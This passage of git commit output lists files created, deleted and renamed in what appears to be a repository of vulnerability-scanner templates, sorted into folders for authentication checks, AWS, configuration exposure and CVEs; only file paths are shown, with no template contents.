poc/auth/apisix-default-login-491.yaml create mode 100644 poc/auth/apple-app-site-association-524.yaml delete mode 100644 poc/auth/argocd-login.yaml rename poc/auth/{avatier-password-management.yaml => avatier-password-management-604.yaml} (100%) create mode 100644 poc/auth/aws-opensearch-login-649.yaml delete mode 100644 poc/auth/aws-opensearch-login-650.yaml delete mode 100644 poc/auth/axiom-digitalocean-key-exposure-666.yaml rename poc/auth/{axiom-digitalocean-key-exposure.yaml => axiom-digitalocean-key-exposure-668.yaml} (100%) create mode 100644 poc/auth/azkaban-default-login-674.yaml delete mode 100644 poc/auth/azkaban-default-login.yaml rename poc/auth/{bazarr-login-700.yaml => bazarr-login-703.yaml} (100%) create mode 100644 poc/auth/beyondtrust-login-server-719.yaml create mode 100644 poc/auth/bigbluebutton-login-725.yaml delete mode 100644 poc/auth/bigbluebutton-login-726.yaml delete mode 100644 poc/auth/braintree-access-token.yaml delete mode 100644 poc/auth/branch-key-774.yaml create mode 100644 poc/auth/branch-key-775.yaml delete mode 100644 poc/auth/brother-unauthorized-access-792.yaml rename poc/auth/{businessintelligence-default-login-817.yaml => businessintelligence-default-login-814.yaml} (100%) delete mode 100644 poc/auth/businessintelligence-default-login.yaml create mode 100644 poc/auth/chinaunicom-default-login-909.yaml rename poc/auth/{cisco-finesse-login-938.yaml => cisco-finesse-login-940.yaml} (100%) rename poc/auth/{cisco-integrated-login-943.yaml => cisco-integrated-login-941.yaml} (100%) create mode 100644 poc/auth/cisco-ucs-kvm-login-979.yaml delete mode 100644 poc/auth/cisco-ucs-kvm-login-980.yaml rename poc/auth/{clave-login-panel-994.yaml => clave-login-panel-996.yaml} (100%) create mode 100644 poc/auth/clickhouse-unauth-1002.yaml create mode 100644 poc/auth/cobbler-default-login.yaml delete mode 100644 poc/auth/codian-mcu-login-1139.yaml delete mode 100644 poc/auth/coldfusion-administrator-login-1145.yaml create mode 100644 poc/auth/cortex-xsoar-login-1225.yaml delete mode 100644 poc/auth/cortex-xsoar-login-1227.yaml delete mode 100644 poc/auth/credential-exposure-file.yaml delete mode 100644 poc/auth/credentials-1257.yaml create mode 100644 poc/auth/credentials-1258.yaml rename poc/auth/{credentials-disclosure-1252.yaml => credentials-disclosure.yaml} (100%) delete mode 100644 poc/auth/crush-ftp-login-1273.yaml create mode 100644 poc/auth/crush-ftp-login-1275.yaml rename poc/auth/{cs-cart-unauthenticated-lfi.yaml => cs-cart-unauthenticated-lfi-1281.yaml} (100%) delete mode 100644 poc/auth/cs141-default-login-1277.yaml create mode 100644 poc/auth/cs141-default-login-1278.yaml create mode 100644 poc/auth/dbeaver-credentials-6780.yaml delete mode 100644 poc/auth/dbeaver-credentials-6782.yaml delete mode 100644 poc/auth/dell-idrac-default-login-6946.yaml delete mode 100644 poc/auth/dell-idrac9-default-login-6932.yaml delete mode 100644 poc/auth/dell-openmanager-login-6949.yaml delete mode 100644 poc/auth/dell-wyse-login-6954.yaml create mode 100644 poc/auth/django-secret-key.yaml delete mode 100644 poc/auth/django-secret.key.yaml delete mode 100644 poc/auth/dolphinscheduler-default-login-7073.yaml create mode 100644 poc/auth/dubbo-admin-default-login-7120.yaml delete mode 100644 poc/auth/dubbo-admin-default-login.yaml create mode 100644 poc/auth/dvwa-headless-automatic-login-7131.yaml delete mode 100644 poc/auth/epmp-login-7230.yaml create mode 100644 poc/auth/epmp-login.yaml create mode 100644 poc/auth/etcd-keys-7261.yaml create mode 100644 poc/auth/etcd-keys-7262.yaml create mode 100644 poc/auth/exacqvision-default-login-7277.yaml create mode 100644 poc/auth/exposed-authentication-asmx.yaml create mode 100644 poc/auth/facebook-secret-11849.yaml delete mode 100644 poc/auth/facebook-secret-7386.yaml create mode 100644 poc/auth/faraday-login-7395.yaml delete mode 100644 poc/auth/fcm-server-key-7452.yaml create mode 100644 poc/auth/fcm-server-key-7454.yaml create mode 100644 poc/auth/fireware-xtm-user-authentication-7501.yaml delete mode 100644 poc/auth/fireware-xtm-user-authentication-7503.yaml create mode 100644 poc/auth/flir-default-login.yaml rename poc/auth/{frp-default-login.yaml => frp-default-login-7559.yaml} (100%) delete mode 100644 poc/auth/ftp-credentials-exposure-7568.yaml create mode 100644 poc/auth/ftp-credentials-exposure.yaml delete mode 100644 poc/auth/ftp-default-creds.yaml rename poc/auth/{fuelcms-default-login.yaml => fuelcms-default-login-7571.yaml} (100%) delete mode 100644 poc/auth/fuelcms-default-login-7572.yaml delete mode 100644 poc/auth/general-tokens-7584.yaml create mode 100644 poc/auth/geoserver-default-login-7594.yaml create mode 100644 poc/auth/geoserver-default-login.yaml delete mode 100644 poc/auth/git-credentials-7643.yaml create mode 100644 poc/auth/git-credentials-7644.yaml create mode 100644 poc/auth/gitlab-public-signup-7681.yaml create mode 100644 poc/auth/gitlab-weak-login-7705.yaml delete mode 100644 poc/auth/glpi-authentication-7727.yaml create mode 100644 poc/auth/glpi-authentication-7730.yaml rename poc/auth/{glpi-login-7735.yaml => glpi-login-7737.yaml} (100%) rename poc/auth/{google-earth-dlogin.yaml => google-earth-dlogin-7780.yaml} (100%) rename poc/auth/{facebook-secrets.yaml => google-secrets.yaml} (100%) delete mode 100644 poc/auth/gophish-default-login.yaml create mode 100644 poc/auth/grafana-default-login-7804.yaml create mode 100644 poc/auth/grafana-public-signup-7816.yaml delete mode 100644 poc/auth/gt-ac2900-login.yaml delete mode 100644 poc/auth/guacamole-default-login-7859.yaml delete mode 100644 poc/auth/hadoop-unauth-7877.yaml delete mode 100644 poc/auth/hivemanager-login-panel-7965.yaml create mode 100644 poc/auth/hp-ilo-serial-key-disclosure-8025.yaml delete mode 100644 poc/auth/hp-switch-default-login.yaml delete mode 100644 poc/auth/hpe-system-management-login-8014.yaml create mode 100644 poc/auth/hpe-system-management-login-8016.yaml create mode 100644 poc/auth/hrsale-unauthenticated-lfi-8039.yaml delete mode 100644 poc/auth/hrsale-unauthenticated-lfi.yaml delete mode 100644 poc/auth/htpasswd-detection-8046.yaml delete mode 100644 poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml create mode 100644 poc/auth/http-etcd-unauthenticated-api-data-leak.yaml delete mode 100644 poc/auth/huawei-hg532e-default-router-login-8064.yaml create mode 100644 poc/auth/huawei-router-auth-bypass-8076.yaml create mode 100644 poc/auth/ibm-mqseries-default-login-8106.yaml delete mode 100644 poc/auth/ibm-mqseries-default-login-8107.yaml delete mode 100644 poc/auth/ibm-note-login-8110.yaml create mode 100644 poc/auth/ibm-note-login-8111.yaml delete mode 100644 poc/auth/icinga-web-login-8136.yaml create mode 100644 poc/auth/icinga-web-login-8137.yaml create mode 100644 poc/auth/inspur-clusterengine-default-login.yaml delete mode 100644 poc/auth/iptime-default-login-8193.yaml create mode 100644 poc/auth/jenkins-default-login.yaml delete mode 100644 poc/auth/jenkins-login-8277.yaml create mode 100644 poc/auth/jenkins-login-8279.yaml mode change 100644 => 100755 poc/auth/jenkins-weak-password.yaml rename poc/auth/{jfrog-unauth-build-exposed-8302.yaml => jfrog-unauth-build-exposed-8299.yaml} (100%) delete mode 100644 poc/auth/jinher-oa-default-login-8312.yaml create mode 100644 poc/auth/jira-service-desk-signup-8317.yaml delete mode 100644 poc/auth/jira-service-desk-signup-8321.yaml delete mode 100644 poc/auth/jira-unauthenticated-popular-filters-8331.yaml delete mode 100644 poc/auth/jira-unauthenticated-projects-8335.yaml create mode 100644 poc/auth/jira-unauthenticated-projects.yaml create mode 100644 poc/auth/jira-unauthenticated-screens-8338.yaml delete mode 100644 poc/auth/jira-unauthenticated-screens.yaml create mode 100644 poc/auth/jira-unauthenticated-user-picker.yaml delete mode 100644 poc/auth/jmx-default-login-8355.yaml create mode 100644 poc/auth/jmx-default-login.yaml delete mode 100644 poc/auth/jolokia-unauthenticated-lfi.yaml create mode 100644 poc/auth/jupyter-ipython-unauth-8402.yaml create mode 100644 poc/auth/kafka-center-default-login-8416.yaml delete mode 100644 poc/auth/kenesto-login-8444.yaml create mode 100644 poc/auth/kenesto-login-8445.yaml create mode 100644 poc/auth/keycloak-json-8473.yaml rename poc/auth/{keycloak-openid-config-8476.yaml => keycloak-openid-config-8475.yaml} (100%) create mode 100644 poc/auth/keycloak-openid-config.yaml delete mode 100644 poc/auth/keycloak-xss-8480.yaml create mode 100644 poc/auth/kiwitcms-login-8496.yaml delete mode 100644 poc/auth/kiwitcms-login-8497.yaml rename poc/auth/{kubernetes-unauth(1).yaml => kubernetes-unauth.yaml} (100%) create mode 100644 poc/auth/kyan-network-credentials-disclosure-8556.yaml delete mode 100644 poc/auth/lucee-login-8662.yaml create mode 100644 poc/auth/maian-cart-preauth-rce-8721.yaml delete mode 100644 poc/auth/mantisbt-default-credential-8779.yaml delete mode 100644 poc/auth/meshcentral-login-8801.yaml create mode 100644 poc/auth/meshcentral-login-8803.yaml delete mode 100644 poc/auth/minio-default-login-8888.yaml delete mode 100644 poc/auth/mongodb-unauth.yaml delete mode 100644 poc/auth/nagios-default-login-8991.yaml create mode 100644 poc/auth/nagios-default-login.yaml create mode 100644 poc/auth/netsus-server-login-9061.yaml delete mode 100644 poc/auth/netsus-server-login-9062.yaml create mode 100644 poc/auth/nuuno-network-login-9164.yaml create mode 100644 poc/auth/oauth-access-key-9186.yaml create mode 100644 poc/auth/oauth2-detect-9181.yaml create mode 100644 poc/auth/octobercms-default-login-9192.yaml rename poc/auth/{octobercms-default-login-9193.yaml => octobercms-default-login.yaml} (100%) create mode 100644 poc/auth/open-stack-dashboard-login-9322.yaml delete mode 100644 poc/auth/open-stack-dashboard-login-9324.yaml create mode 100644 poc/auth/openbmcs-secret-disclosure-9260.yaml delete mode 100644 poc/auth/openbmcs-secret-disclosure.yaml delete mode 100644 poc/auth/oracle-ebs-credentials-9365.yaml create mode 100644 poc/auth/oracle-ebs-credentials-9366.yaml create mode 100644 poc/auth/panabit-default-login-9438.yaml rename poc/auth/{panabit-default-login-9440.yaml => panabit-default-login.yaml} (100%) delete mode 100644 poc/auth/panabit-ixcache-default-login.yaml delete mode 100644 poc/auth/pentaho-default-login.yaml create mode 100644 poc/auth/pieregister-open-redirect-9579.yaml delete mode 100644 poc/auth/pieregister-open-redirect.yaml delete mode 100644 poc/auth/pinpoint-unauth-9590.yaml create mode 100644 poc/auth/private-key-9655.yaml delete mode 100644 poc/auth/private-key-9656.yaml create mode 100644 poc/auth/putty-private-key-disclosure-9731.yaml delete mode 100644 poc/auth/putty-private-key-disclosure-9732.yaml delete mode 100644 poc/auth/rabbitmq-default-login-9786.yaml delete mode 100644 poc/auth/rabbitmq-default-login.yaml rename poc/auth/{rails-secret-token-disclosure-9809.yaml => rails-secret-token-disclosure-9810.yaml} (100%) delete mode 100644 poc/auth/rainloop-default-login-9813.yaml rename poc/auth/{rancher-default-login-9815.yaml => rancher-default-login.yaml} (100%) delete mode 100644 poc/auth/ranger-default-login-9827.yaml rename poc/auth/{ranger-default-login-9828.yaml => ranger-default-login.yaml} (100%) delete mode 100644 poc/auth/remote-ui-login-9859.yaml create mode 100644 poc/auth/remote-ui-login-9861.yaml create mode 100644 poc/auth/ricoh-weak-password-9880.yaml rename poc/auth/{ricoh-weak-password-9882.yaml => ricoh-weak-password.yaml} (100%) delete mode 100644 poc/auth/rockmongo-default-login.yaml create mode 100644 poc/auth/routeros-login.yaml create mode 100644 poc/auth/rseenet-default-login-9913.yaml delete mode 100644 poc/auth/saferoads-vms-login-9970.yaml create mode 100644 poc/auth/saferoads-vms-login-9973.yaml create mode 100644 poc/auth/sangfor-edr-auth-bypass.yaml delete mode 100644 poc/auth/seats-login-10104.yaml create mode 100644 poc/auth/seats-login-10107.yaml create mode 100644 poc/auth/secnet-ac-default-login.yaml rename poc/auth/{sendgrid-api-key-10140.yaml => sendgrid-api-key-10142.yaml} (100%) create mode 100644 poc/auth/sendgrid-api-key.yaml delete mode 100644 poc/auth/sequoiadb-default-login-10151.yaml create mode 100644 poc/auth/sequoiadb-default-login-10152.yaml delete mode 100644 poc/auth/server-backup-login-10153.yaml create mode 100644 poc/auth/server-backup-login-10156.yaml delete mode 100644 poc/auth/service-pwd-10178.yaml create mode 100644 poc/auth/servicedesk-login-panel-10171.yaml delete mode 100644 poc/auth/servicedesk-login-panel-10173.yaml create mode 100644 poc/auth/servicenow-helpdesk-credential.yaml delete mode 100644 poc/auth/sgp-login-panel-10184.yaml create mode 100644 poc/auth/sgp-login-panel-10186.yaml create mode 100644 poc/auth/sharecenter-login-10187.yaml delete mode 100644 poc/auth/sharecenter-login-10189.yaml create mode 100644 poc/auth/shopify-custom-token(1).yaml rename poc/auth/{shopify-custom-token-10198.yaml => shopify-custom-token-11860.yaml} (100%) delete mode 100644 poc/auth/shopify-private-token-10199.yaml create mode 100644 poc/auth/shopify-shared-secret-11862.yaml rename poc/auth/{shoppable-token-10209.yaml => shoppable-token-10208.yaml} (100%) delete mode 100644 poc/auth/siteomat-login-10301.yaml create mode 100644 poc/auth/siteomat-login-10303.yaml rename poc/auth/{slack-bot-token-10312.yaml => slack-bot-token-10313.yaml} (100%) rename poc/auth/{sonarqube-login-10376.yaml => sonarqube-login-10374.yaml} (100%) delete mode 100644 poc/auth/sonarqube-token.yaml delete mode 100644 poc/auth/splunk-enterprise-login-panel.yml create mode 100644 poc/auth/splunk-login-10416.yaml create mode 100644 poc/auth/squirrelmail-login-10521.yaml delete mode 100644 poc/auth/ssrf-via-oauth-misconfig-10526.yaml create mode 100644 poc/auth/stackstorm-default-login-10530.yaml delete mode 100644 poc/auth/stripe-api-key(1).yaml create mode 100644 poc/auth/stripe-api-key-11869.yaml delete mode 100644 poc/auth/stripe-restricted-key-10553.yaml create mode 100644 poc/auth/stripe-restricted-key.yaml rename poc/auth/{stripe-secret-key.yaml => stripe-secret-key-10558.yaml} (100%) create mode 100644 poc/auth/submitty-login-10567.yaml delete mode 100644 poc/auth/submitty-login-10568.yaml delete mode 100644 poc/auth/supermicro-default-login.yaml delete mode 100644 poc/auth/symantec-epm-login-10599.yaml rename poc/auth/{symantec-ewep-login-10603.yaml => symantec-ewep-login-10606.yaml} (100%) delete mode 100644 poc/auth/szhe-default-login-10638.yaml create mode 100644 poc/auth/szhe-default-login.yaml create mode 100644 poc/auth/telecom-gateway-default-login.yaml delete mode 100644 poc/auth/tidb-unauth-10772.yaml delete mode 100644 poc/auth/trilithic-viewpoint-login.yaml delete mode 100644 poc/auth/twitter-secret(1).yaml create mode 100644 poc/auth/twitter-secret-10862.yaml create mode 100644 poc/auth/ucmdb-default-login-10871.yaml delete mode 100644 poc/auth/ucmdb-default-login.yaml rename poc/auth/{unauth-message-read-10947.yaml => unauth-message-read.yaml} (100%) delete mode 100644 poc/auth/unauth-xproxy-dashboard-10968.yaml create mode 100644 poc/auth/unauth-xproxy-dashboard-10969.yaml create mode 100644 poc/auth/unauthenticated-airflow-10884.yaml delete mode 100644 poc/auth/unauthenticated-alert-manager.yaml create mode 100644 poc/auth/unauthenticated-frp-10895.yaml delete mode 100644 poc/auth/unauthenticated-frp-10896.yaml create mode 100644 poc/auth/unauthenticated-glowroot-10900.yaml create mode 100644 poc/auth/unauthenticated-mongo-express-10911.yaml create mode 100644 poc/auth/unauthenticated-nacos-access-10912.yaml delete mode 100644 poc/auth/unauthenticated-netdata-10916.yaml create mode 100644 poc/auth/unauthenticated-netdata-10918.yaml create mode 100644 poc/auth/unauthenticated-popup-upload-10922.yaml delete mode 100644 poc/auth/unauthenticated-popup-upload-10923.yaml delete mode 100644 poc/auth/unauthenticated-prtg-10924.yaml rename poc/auth/{unauthenticated-zipkin-10936.yaml => unauthenticated-zipkin-10935.yaml} (100%) create mode 100644 poc/auth/unauthenticated-zipkin.yaml delete mode 100644 poc/auth/unauthorized-h3csecparh-login-10949.yaml create mode 100644 poc/auth/unauthorized-h3csecparh-login.yaml rename poc/auth/{unauthorized-hp-printer-10954.yaml => unauthorized-hp-printer-10951.yaml} (100%) delete mode 100644 poc/auth/unauthorized-hp-printer-10953.yaml create mode 100644 poc/auth/unauthorized-plastic-scm-10955.yaml delete mode 100644 poc/auth/unauthorized-plastic-scm-10957.yaml rename poc/auth/{unauthorized-puppet-node-manager-detect-10958.yaml => unauthorized-puppet-node-manager-detect-10959.yaml} (100%) delete mode 100644 poc/auth/versa-default-login.yaml delete mode 100644 poc/auth/vigor-login-11021.yaml create mode 100644 poc/auth/vigor-login-11023.yaml create mode 100644 poc/auth/visionhub-default-login-11026.yaml rename poc/auth/{visionhub-default-login-11029.yaml => visionhub-default-login.yaml} (100%) delete mode 100644 poc/auth/vpms-auth-bypass-11066.yaml delete mode 100644 poc/auth/watchguard-credentials-disclosure.yaml delete mode 100644 poc/auth/weblogic-weak-login.yaml create mode 100644 poc/auth/wifisky-default-login-11201.yaml create mode 100644 poc/auth/wifisky-default-login.yaml create mode 100644 poc/auth/wordpress-weak-credentials-11335.yaml rename poc/auth/{wso2-default-login-11641.yaml => wso2-default-login.yaml} (100%) create mode 100644 poc/auth/xenforo-login-11673.yaml create mode 100644 poc/auth/xenforo-login-11674.yaml create mode 100644 poc/auth/xenmobile-login-11675.yaml delete mode 100644 poc/auth/xenmobile-login-11677.yaml create mode 100644 poc/auth/xvr-login-11704.yaml delete mode 100644 poc/auth/xvr-login-11706.yaml rename poc/auth/{zabbix-default-login-11762.yaml => zabbix-default-login-11763.yaml} (100%) delete mode 100644 poc/auth/zabbix-server-login-11767.yaml create mode 100644 poc/auth/zabbix-server-login-11770.yaml create mode 100644 poc/auth/zhiyuan-oa-session-leak-11802.yaml rename poc/auth/{zimbra-preauth-ssrf.yaml => zimbra-preauth-ssrf-11811.yaml} (100%) create mode 100644 poc/auth/zmanda-default-login-11826.yaml delete mode 100644 poc/auth/zmanda-default-login.yaml rename poc/auth/{zms-auth-bypass-11830.yaml => zms-auth-bypass-11832.yaml} (100%) delete mode 100644 poc/aws/amazon-docker-config-280.yaml delete mode 100644 poc/aws/amazon-docker-config-disclosure-278.yaml create mode 100644 poc/aws/amazon-docker-config.yaml delete mode 100644 poc/aws/amazon-mws-auth-token-11845.yaml create mode 100644 poc/aws/amazon-mws-auth-token.yaml rename poc/aws/{aws-access-id-620.yaml => aws-access-id-618.yaml} (100%) create mode 100644 poc/aws/aws-bucket-takeover-630.yaml delete mode 100644 poc/aws/aws-bucket-takeover-632.yaml create mode 100644 poc/aws/aws-ecs-container-agent-tasks-640.yaml rename poc/aws/{aws-object-listing-648.yaml => aws-object-listing-645.yaml} (100%) create mode 100644 poc/aws/aws-opensearch-login-649.yaml delete mode 100644 poc/aws/aws-opensearch-login-650.yaml create mode 100644 poc/aws/awstats-config-656.yaml delete mode 100644 poc/aws/ec2-detection-7162.yaml create mode 100644 poc/aws/metadata-aws-8810.yaml delete mode 100644 poc/aws/s3-detect-9965.yaml create mode 100644 poc/aws/s3-subtakeover-9967.yaml create mode 100644 poc/backup/adb-backup-enabled-62.yaml delete mode 100644 poc/backup/adb-backup-enabled-63.yaml rename poc/backup/{php-backup-files-9497.yaml => php-backup-files-9498.yaml} (100%) delete mode 100644 poc/backup/server-backup-login-10153.yaml create mode 100644 poc/backup/server-backup-login-10156.yaml delete mode 100644 poc/backup/server-backup-manager-se-10157.yaml create mode 100644 poc/backup/server-backup-manager-se-10160.yaml delete mode 100644 poc/backup/zip-backup-files-11815.yaml create mode 100644 poc/cisco/cisco-asa-panel-932.yaml create mode 100644 poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml delete mode 100644 poc/cisco/cisco-cloudcenter-suite-rce.yaml rename poc/cisco/{cisco-finesse-login-938.yaml => cisco-finesse-login-940.yaml} (100%) rename poc/cisco/{cisco-integrated-login-943.yaml => cisco-integrated-login-941.yaml} (100%) create mode 100644 poc/cisco/cisco-meraki-exposure-944.yaml delete mode 100644 poc/cisco/cisco-meraki-exposure-946.yaml create mode 100644 poc/cisco/cisco-network-config-948.yaml delete mode 100644 poc/cisco/cisco-secure-desktop-962.yaml create mode 100644 poc/cisco/cisco-sendgrid-969.yaml create mode 100644 poc/cisco/cisco-smi-exposure-971.yaml create mode 100644 poc/cisco/cisco-telepresence-976.yaml delete mode 100644 poc/cisco/cisco-telepresence-978.yaml create mode 100644 poc/cisco/cisco-ucs-kvm-login-979.yaml delete mode 100644 poc/cisco/cisco-ucs-kvm-login-980.yaml delete mode 100644 poc/coldfusion/adobe-coldfusion-detect-82.yaml create mode 100644 poc/coldfusion/adobe-coldfusion-detect.yaml rename poc/coldfusion/{adobe-coldfusion-error-detect.yaml => adobe-coldfusion-error-detect-88.yaml} (100%) delete mode 100644 poc/coldfusion/coldfusion-administrator-login-1145.yaml rename poc/coldfusion/{coldfusion-debug-xss.yaml => coldfusion-debug-xss-1153.yaml} (100%) delete mode 100644 poc/config/aerohive-netconfig-ui.yaml delete mode 100644 poc/config/airflow-configuration-exposure-230.yaml create mode 100644 poc/config/airflow-configuration-exposure.yaml delete mode 100644 poc/config/amazon-docker-config-280.yaml delete mode 100644 poc/config/amazon-docker-config-disclosure-278.yaml create mode 100644 poc/config/amazon-docker-config.yaml create mode 100644 poc/config/ansible-config-disclosure-326.yaml delete mode 100644 poc/config/ansible-config-disclosure.yaml delete mode 100644 poc/config/api-iconfinder-439.yaml create mode 100644 poc/config/api-iconfinder.yaml create mode 100644 poc/config/awstats-config-656.yaml create mode 100644 poc/config/bigip-config-utility-detect-731.yaml create mode 100644 poc/config/bigip-config-utility-detect-733.yaml delete mode 100644 poc/config/buffalo-config-injection-798.yaml rename poc/config/{buffalo-config-injection-800.yaml => buffalo-config-injection-801.yaml} (100%) delete mode 100644 poc/config/circleci-config-924.yaml create mode 100644 poc/config/cisco-network-config-948.yaml delete mode 100644 poc/config/config-rb-1179.yaml create mode 100644 poc/config/configuration-listing-1182.yaml create mode 100644 poc/config/confluence-ssrf-sharelinks-1192.yaml delete mode 100644 poc/config/confluence-ssrf-sharelinks-1193.yaml delete mode 100644 poc/config/coremail-config-disclosure-1215.yaml create mode 100644 poc/config/coremail-config-disclosure-1216.yaml create mode 100644 poc/config/docker-compose-config-7059.yaml create mode 100644 poc/config/dockercfg-config-7056.yaml delete mode 100644 poc/config/dockercfg-config.yaml create mode 100644 poc/config/esmtprc-config-7260.yaml create mode 100644 poc/config/firebase-config-exposure-7487.yaml rename poc/config/{firebase-config-exposure-7485.yaml => firebase-config-exposure.yaml} (100%) delete mode 100644 poc/config/ftpconfig-7565.yaml create mode 100644 poc/config/ftpconfig.yaml delete mode 100644 poc/config/git-config-7633.yaml create mode 100644 poc/config/git-config-7638.yaml create mode 100644 poc/config/git-config-nginxoffbyslash-7628.yaml delete mode 100644 poc/config/github-page-config.yaml delete mode 100644 poc/config/gocd-cruise-configuration-7746.yaml create mode 100644 poc/config/gocd-cruise-configuration-7748.yaml create mode 100644 poc/config/honeywell-scada-config-7990.yaml delete mode 100644 poc/config/honeywell-scada-config.yaml delete mode 100644 poc/config/htaccess-config-8044.yaml mode change 100644 => 100755 poc/config/joomla-config-dist-file.yaml create mode 100644 poc/config/joomla-config-file-8376.yaml rename poc/config/{joomla-config-file-8375.yaml => joomla-config-file.yaml} (100%) rename poc/config/{keycloak-openid-config-8476.yaml => keycloak-openid-config-8475.yaml} (100%) create mode 100644 poc/config/keycloak-openid-config.yaml create mode 100644 poc/config/magento-config-8702.yaml delete mode 100644 poc/config/magento-config-disclosure.yaml rename poc/config/{nginx-config.yaml => nginx-config-9097.yaml} (100%) delete mode 100644 poc/config/nginx-config-9098.yaml create mode 100644 poc/config/owncloud-config-9420.yaml delete mode 100644 poc/config/owncloud-config.yaml create mode 100644 poc/config/php-fpm-config-9514.yaml delete mode 100644 poc/config/php-fpm-config.yaml create mode 100644 poc/config/proftpd-config-9667.yaml delete mode 100644 poc/config/proftpd-config.yaml create mode 100644 poc/config/prometheus-config-9673.yaml delete mode 100644 poc/config/prometheus-config.yaml delete mode 100644 poc/config/rails-database-config-9802.yaml delete mode 100644 poc/config/rconfig-rce-9834.yaml delete mode 100644 poc/config/samba-config.yaml delete mode 100644 poc/config/springboot-autoconfig.yaml delete mode 100644 poc/config/springboot-configprops-10443.yaml create mode 100644 poc/config/springboot-configprops-10444.yaml delete mode 100644 poc/config/ssrf-via-oauth-misconfig-10526.yaml delete mode 100644 poc/config/svnserve-config-10590.yaml create mode 100644 poc/config/svnserve-config.yaml rename poc/config/{symfony-database-config-10616.yaml => symfony-database-config.yaml} (100%) rename poc/config/{tcpconfig-10665.yaml => tcpconfig-10663.yaml} (100%) create mode 100644 poc/config/tcpconfig.yaml create mode 100644 poc/config/tugboat-config-exposure-10844.yaml delete mode 100644 poc/config/wamp-server-configuration-11098.yaml rename poc/config/{wamp-server-configuration-11099.yaml => wamp-server-configuration.yaml} (100%) create mode 100644 poc/config/wordpress-accessible-wpconfig-11234.yaml delete mode 100644 poc/config/wp-config-setup-11427.yaml create mode 100644 poc/config/wp-config-setup-11428.yaml delete mode 100644 poc/crlf_injection/crlf-injection-1260.yaml create mode 100644 poc/crlf_injection/crlf-injection-1262.yaml delete mode 100644 poc/crlf_injection/viewlinc-crlf-injection-11014.yaml rename poc/cve/{cnvd-2021-28277-1107.yaml => CNVD-2021-28277.yaml} (100%) delete mode 100644 poc/cve/CVE-2001-1473.yaml create mode 100644 poc/cve/CVE-2019-9082 (copy 2).yaml create mode 100644 poc/cve/CVE-2020-10124 (copy 1).yaml rename poc/cve/{cve-2022-0963(1).yaml => CVE-2022-0963.yaml} (100%) create mode 100644 poc/cve/apache-solr-log4j-cve-2021-44228.yaml delete mode 100644 poc/cve/cnvd-2019-01348-1040.yaml create mode 100644 poc/cve/cnvd-2019-01348-1042.yaml delete mode 100644 poc/cve/cnvd-2019-06255-1046.yaml create mode 100644 poc/cve/cnvd-2019-06255-1048.yaml create mode 100644 poc/cve/cnvd-2020-23735-1058.yaml delete mode 100644 poc/cve/cnvd-2020-23735-1059.yaml create mode 100644 poc/cve/cnvd-2020-46552-1060.yaml delete mode 100644 poc/cve/cnvd-2020-62422-1067.yaml create mode 100644 poc/cve/cnvd-2020-62422-1068.yaml delete mode 100644 poc/cve/cnvd-2020-67113-1070.yaml create mode 100644 poc/cve/cnvd-2020-68596-1074.yaml delete mode 100644 poc/cve/cnvd-2021-01931-1078.yaml create mode 100644 poc/cve/cnvd-2021-01931-1079.yaml create mode 100644 poc/cve/cnvd-2021-10543-1084.yaml delete mode 100644 poc/cve/cnvd-2021-10543-1086.yaml delete mode 100644 poc/cve/cnvd-2021-15822-1095.yaml create mode 100644 poc/cve/cnvd-2021-17369-1098.yaml delete mode 100644 poc/cve/cnvd-2021-17369-1101.yaml delete mode 100644 poc/cve/cnvd-2021-26422-1104.yaml create mode 100644 poc/cve/cnvd-2021-28277-1105.yaml create mode 100644 poc/cve/cve-2001-1473.yaml delete mode 100644 poc/cve/cve-2002-1131-1304.yaml create mode 100644 poc/cve/cve-2004-0519-1305.yaml create mode 100644 poc/cve/cve-2006-2842-1331.yaml delete mode 100644 poc/cve/cve-2007-4504.yaml delete mode 100644 poc/cve/cve-2008-6080.yaml delete mode 100644 poc/cve/cve-2008-6172-1387.yaml delete mode 100644 poc/cve/cve-2009-0545.yaml delete mode 100644 poc/cve/cve-2009-0932-1409.yaml delete mode 100644 poc/cve/cve-2009-1496.yaml delete mode 100644 poc/cve/cve-2009-2100-1446.yaml create mode 100644 poc/cve/cve-2009-3053.yaml create mode 100644 poc/cve/cve-2010-0219-1491.yaml delete mode 100644 poc/cve/cve-2010-0696-1498.yaml create mode 100644 poc/cve/cve-2010-0942-1511.yaml create mode 100644 poc/cve/cve-2010-0942.yaml delete mode 100644 poc/cve/cve-2010-0943.yaml create mode 100644 poc/cve/cve-2010-0972-1522.yaml create mode 100644 poc/cve/cve-2010-1219.yaml create mode 100644 poc/cve/cve-2010-1307-1585.yaml create mode 100644 poc/cve/cve-2010-1307.yaml delete mode 100644 poc/cve/cve-2010-1308.yaml delete mode 100644 poc/cve/cve-2010-1312.yaml delete mode 100644 poc/cve/cve-2010-1345.yaml delete mode 100644 poc/cve/cve-2010-1352-1625.yaml delete mode 100644 poc/cve/cve-2010-1353-1630.yaml delete mode 100644 poc/cve/cve-2010-1469-1647.yaml create mode 100644 poc/cve/cve-2010-1470-1653.yaml delete mode 100644 poc/cve/cve-2010-1474.yaml create mode 100644 poc/cve/cve-2010-1475.yaml delete mode 100644 poc/cve/cve-2010-1491.yaml create mode 100644 poc/cve/cve-2010-1494.yaml delete mode 100644 poc/cve/cve-2010-1532.yaml delete mode 100644 poc/cve/cve-2010-1601-1739.yaml create mode 100644 poc/cve/cve-2010-1607.yaml create mode 100644 poc/cve/cve-2010-1653-1759.yaml create mode 100644 poc/cve/cve-2010-1657-1761.yaml create mode 100644 poc/cve/cve-2010-1657.yaml create mode 100644 poc/cve/cve-2010-1659.yaml delete mode 100644 poc/cve/cve-2010-1714-1779.yaml create mode 100644 poc/cve/cve-2010-1715.yaml delete mode 100644 poc/cve/cve-2010-1875-1829.yaml delete mode 100644 poc/cve/cve-2010-1878-1830.yaml delete mode 100644 poc/cve/cve-2010-1954-1848.yaml delete mode 100644 poc/cve/cve-2010-1955-1852.yaml create mode 100644 poc/cve/cve-2010-1982-1886.yaml create mode 100644 poc/cve/cve-2010-1982.yaml create mode 100644 poc/cve/cve-2010-2122-1928.yaml create mode 100644 poc/cve/cve-2010-2122.yaml create mode 100644 poc/cve/cve-2010-2680.yaml create mode 100644 poc/cve/cve-2010-2920.yaml create mode 100644 poc/cve/cve-2010-4977-2017.yaml delete mode 100644 poc/cve/cve-2010-5028-2025.yaml create mode 100644 poc/cve/cve-2011-0049-2036.yaml delete mode 100644 poc/cve/cve-2011-3315-2059.yaml create mode 100644 poc/cve/cve-2011-5107.yaml delete mode 100644 poc/cve/cve-2011-5179.yaml delete mode 100644 